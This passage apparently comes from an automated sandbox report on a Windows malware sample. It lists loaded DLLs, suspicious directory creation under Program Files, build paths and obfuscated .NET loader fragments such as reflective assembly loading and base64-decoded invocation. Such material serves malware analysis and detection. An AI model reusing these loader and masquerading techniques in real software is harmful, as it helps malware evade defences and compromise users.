                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: windows.storage.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: wldp.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: profapi.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: cryptsp.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: rsaenh.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: cryptbase.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: sspicli.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: ntmarta.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: wbemcomn.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: amsi.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: userenv.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: propsys.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: dlnashext.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: wpdshext.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: edputil.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: urlmon.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: iertutil.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: srvcli.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: netutils.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: wintypes.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: appresolver.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: bcp47langs.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: slc.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: sppc.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeSection loaded: mscoree.dll
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeSection loaded: apphelp.dll
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeSection loaded: version.dll
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeSection loaded: mscoree.dll
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeSection loaded: version.dll
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: C:\Brokercrt\comReviewsession.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe
                        Source: C:\Brokercrt\comReviewsession.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\6cb0b6c459d5d3
                        Source: C:\Brokercrt\comReviewsession.exeDirectory created: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe
                        Source: C:\Brokercrt\comReviewsession.exeDirectory created: C:\Program Files\7-Zip\Lang\18607e77f76bf7
                        Source: Vjy8d2EoqK.exeStatic file information: File size 8422912 > 1048576
                        Source: Vjy8d2EoqK.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x806400
                        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Vjy8d2EoqK.exe, 00000000.00000003.1694720616.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchosts.exe, 00000002.00000003.1703373977.0000000006D29000.00000004.00000020.00020000.00000000.sdmp, svchosts.exe, 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmp, svchosts.exe, 00000002.00000000.1694475780.00000000002C3000.00000002.00000001.01000000.00000006.sdmp, svchosts.exe, 00000002.00000003.1704318738.00000000055C7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: Built.exe, 00000003.00000002.2060889895.00007FFDF7140000.00000040.00000001.01000000.0000001E.sdmp
                        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: XClient.exe, 00000006.00000002.2837735994.000000001C2DE000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: Built.exe
                        Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: Built.exe, 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: Built.exe, 00000003.00000002.2063693974.00007FFDF7460000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbv source: XClient.exe, 00000006.00000002.2837735994.000000001C2DE000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Built.exe, 00000001.00000003.1690578642.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2073776444.00007FFE13311000.00000002.00000001.01000000.00000008.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Built.exe, 00000001.00000003.1690578642.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2073776444.00007FFE13311000.00000002.00000001.01000000.00000008.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: Built.exe, Built.exe, 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp
                        Source: Binary string: symbols\dll\mscorlib.pdbpdb` source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: Built.exe, Built.exe, 00000003.00000002.2063693974.00007FFDF74E2000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: .pdb! source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: Built.exe, 00000003.00000002.2066532868.00007FFDFB63B000.00000040.00000001.01000000.00000007.sdmp
                        Source: Binary string: 0C:\Windows\mscorlib.pdb source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: Built.exe, Built.exe, 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: Built.exe, 00000003.00000002.2072519669.00007FFE130C1000.00000040.00000001.01000000.00000018.sdmp
                        Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: Built.exe, 00000003.00000002.2063693974.00007FFDF7460000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: Built.exe, 00000003.00000002.2073120722.00007FFE13221000.00000040.00000001.01000000.0000000D.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: XClient.exe, 00000006.00000002.2837735994.000000001C2B7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: Built.exe, Built.exe, 00000003.00000002.2068139696.00007FFE10301000.00000040.00000001.01000000.0000001C.sdmp
                        Source: Binary string: mscorlib.pdb source: XClient.exe, 00000006.00000002.2837735994.000000001C2F9000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000006.00000002.2837735994.000000001C2B7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: XClient.exe, 00000006.00000002.2805106909.000000000137B000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdbzS source: XClient.exe, 00000006.00000002.2837735994.000000001C2F9000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: Built.exe, 00000003.00000002.2071781331.00007FFE126EC000.00000040.00000001.01000000.00000013.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb6SK source: XClient.exe, 00000006.00000002.2837735994.000000001C2F9000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: Built.exe, 00000003.00000002.2072230759.00007FFE12E11000.00000040.00000001.01000000.0000001D.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: Built.exe, 00000003.00000002.2071781331.00007FFE126EC000.00000040.00000001.01000000.00000013.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: Built.exe, 00000003.00000002.2069831298.00007FFE11ED1000.00000040.00000001.01000000.00000014.sdmp
                        Source: Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdbgI source: Vjy8d2EoqK.exe, 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, S l r .exe, 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, S l r .exe, 00000004.00000003.1715340990.000000000055D000.00000004.00000020.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000000.1711320937.00000000004F2000.00000002.00000001.01000000.00000010.sdmp
                        Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbxC source: XClient.exe, 00000006.00000002.2837735994.000000001C2DE000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb+ source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdb source: Vjy8d2EoqK.exe, 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, S l r .exe, 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, S l r .exe, 00000004.00000003.1715340990.000000000055D000.00000004.00000020.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000000.1711320937.00000000004F2000.00000002.00000001.01000000.00000010.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: Built.exe, 00000003.00000002.2068410527.00007FFE11511000.00000040.00000001.01000000.00000017.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: Built.exe, 00000003.00000002.2068979662.00007FFE11EA1000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: indoC:\Windows\mscorlib.pdb source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: Built.exe, Built.exe, 00000003.00000002.2067833752.00007FFE10241000.00000040.00000001.01000000.00000019.sdmp

                        Data Obfuscation

                        barindex
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, JrCZwsIvjVF3h1G2N1o.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{WVLhEOUW7kSTjheFow9MPM._3wVPV9O1Btwc67v7Rkl2yv,WVLhEOUW7kSTjheFow9MPM.i5cpgVlNzZBHY37BjHySvz,WVLhEOUW7kSTjheFow9MPM.lYEDz9R4YBUwueunC5bjTx,WVLhEOUW7kSTjheFow9MPM.Tv35SK75a97ZHPINyZNVLP,NlOekkeE5O7s901dhU6uz3._68dLv7zBjvWAxH3b1q2lxa()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{rMs6XE5PBmVr0JdmdUuJWr[2],NlOekkeE5O7s901dhU6uz3.q8I1g5z0j0F2IdHL9YTlDh(Convert.FromBase64String(rMs6XE5PBmVr0JdmdUuJWr[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { rMs6XE5PBmVr0JdmdUuJWr[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{WVLhEOUW7kSTjheFow9MPM._3wVPV9O1Btwc67v7Rkl2yv,WVLhEOUW7kSTjheFow9MPM.i5cpgVlNzZBHY37BjHySvz,WVLhEOUW7kSTjheFow9MPM.lYEDz9R4YBUwueunC5bjTx,WVLhEOUW7kSTjheFow9MPM.Tv35SK75a97ZHPINyZNVLP,NlOekkeE5O7s901dhU6uz3._68dLv7zBjvWAxH3b1q2lxa()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{rMs6XE5PBmVr0JdmdUuJWr[2],NlOekkeE5O7s901dhU6uz3.q8I1g5z0j0F2IdHL9YTlDh(Convert.FromBase64String(rMs6XE5PBmVr0JdmdUuJWr[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { rMs6XE5PBmVr0JdmdUuJWr[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, JrCZwsIvjVF3h1G2N1o.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, Up9XJDYCHy8FYkARRnc.cs.Net Code: s66tDybuig System.AppDomain.Load(byte[])
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, Up9XJDYCHy8FYkARRnc.cs.Net Code: s66tDybuig System.Reflection.Assembly.Load(byte[])
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, Up9XJDYCHy8FYkARRnc.cs.Net Code: s66tDybuig
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs.Net Code: tiOwy7RdbMiZ1z023lmQm2 System.AppDomain.Load(byte[])
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs.Net Code: _8w2gGBofp0eLL7L4VoyOGO System.AppDomain.Load(byte[])
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs.Net Code: _8w2gGBofp0eLL7L4VoyOGO
                        Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs.Net Code: tiOwy7RdbMiZ1z023lmQm2 System.AppDomain.Load(byte[])
                        Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs.Net Code: _8w2gGBofp0eLL7L4VoyOGO System.AppDomain.Load(byte[])
                        Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs.Net Code: _8w2gGBofp0eLL7L4VoyOGO
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, Up9XJDYCHy8FYkARRnc.cs.Net Code: s66tDybuig System.AppDomain.Load(byte[])
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, Up9XJDYCHy8FYkARRnc.cs.Net Code: s66tDybuig System.Reflection.Assembly.Load(byte[])
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, Up9XJDYCHy8FYkARRnc.cs.Net Code: s66tDybuig
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeFile created: C:\Brokercrt\__tmp_rar_sfx_access_check_6475453Jump to behavior
                        Source: S l r .exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1a4e1
                        Source: libffi-8.dll.1.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
                        Source: svchosts.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x123413
                        Source: sqlite3.dll.1.drStatic PE information: real checksum: 0x0 should be: 0x9c6f9
                        Source: libcrypto-1_1.dll.1.drStatic PE information: real checksum: 0x0 should be: 0x118790
                        Source: Built.exe.0.drStatic PE information: real checksum: 0x6e1a3c should be: 0x6d912c
                        Source: libssl-1_1.dll.1.drStatic PE information: real checksum: 0x0 should be: 0x3bfea
                        Source: _ssl.pyd.1.drStatic PE information: real checksum: 0x0 should be: 0x1a089
                        Source: Vjy8d2EoqK.exeStatic PE information: real checksum: 0x0 should be: 0x80fe1e
                        Source: python311.dll.1.drStatic PE information: real checksum: 0x0 should be: 0x1a1a97
                        Source: svchosts.exe.0.drStatic PE information: section name: .didat
                        Source: libffi-8.dll.1.drStatic PE information: section name: UPX2
                        Source: VCRUNTIME140.dll.1.drStatic PE information: section name: _RDATA
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002AE28C push eax; ret 2_2_002AE2AA
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002ACAC7 push eax; retf 002Ah2_2_002ACACE
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002AED46 push ecx; ret 2_2_002AED59
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7035F76 push r8; ret 3_2_00007FFDF7035F83
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7035FB9 push r10; ret 3_2_00007FFDF7035FCC
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7037FEB push r12; ret 3_2_00007FFDF7038036
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF703767B push r12; ret 3_2_00007FFDF70376BF
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7035EAD push rsp; iretd 3_2_00007FFDF7035EAE
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7035EBC push rsi; ret 3_2_00007FFDF7035EBD
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7035EFA push r12; ret 3_2_00007FFDF7035F07
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7038F28 push rsp; iretq 3_2_00007FFDF7038F29
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7037F53 push rbp; iretq 3_2_00007FFDF7037F54
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7035F56 push r12; ret 3_2_00007FFDF7035F6E
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7038DA5 push rsp; retf 3_2_00007FFDF7038DA6
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7035DF7 push r10; retf 3_2_00007FFDF7035DFA
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7035E0F push rsp; ret 3_2_00007FFDF7035E17
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7037630 push rbp; retf 3_2_00007FFDF7037649
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7035E58 push rdi; iretd 3_2_00007FFDF7035E5A
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7035CE0 push r10; retf 3_2_00007FFDF7035CE2
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7035CE5 push r8; ret 3_2_00007FFDF7035CEB
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7035CFE push rdx; ret 3_2_00007FFDF7035D01
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7035D06 push r12; ret 3_2_00007FFDF7035D08
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7038405 push r10; retf 3_2_00007FFDF7038471
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7035C31 push r10; ret 3_2_00007FFDF7035C33
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF70382C4 push rdi; iretd 3_2_00007FFDF70382C6
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF703930D push rsp; ret 3_2_00007FFDF703930E
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7038077 push r12; iretd 3_2_00007FFDF703808B
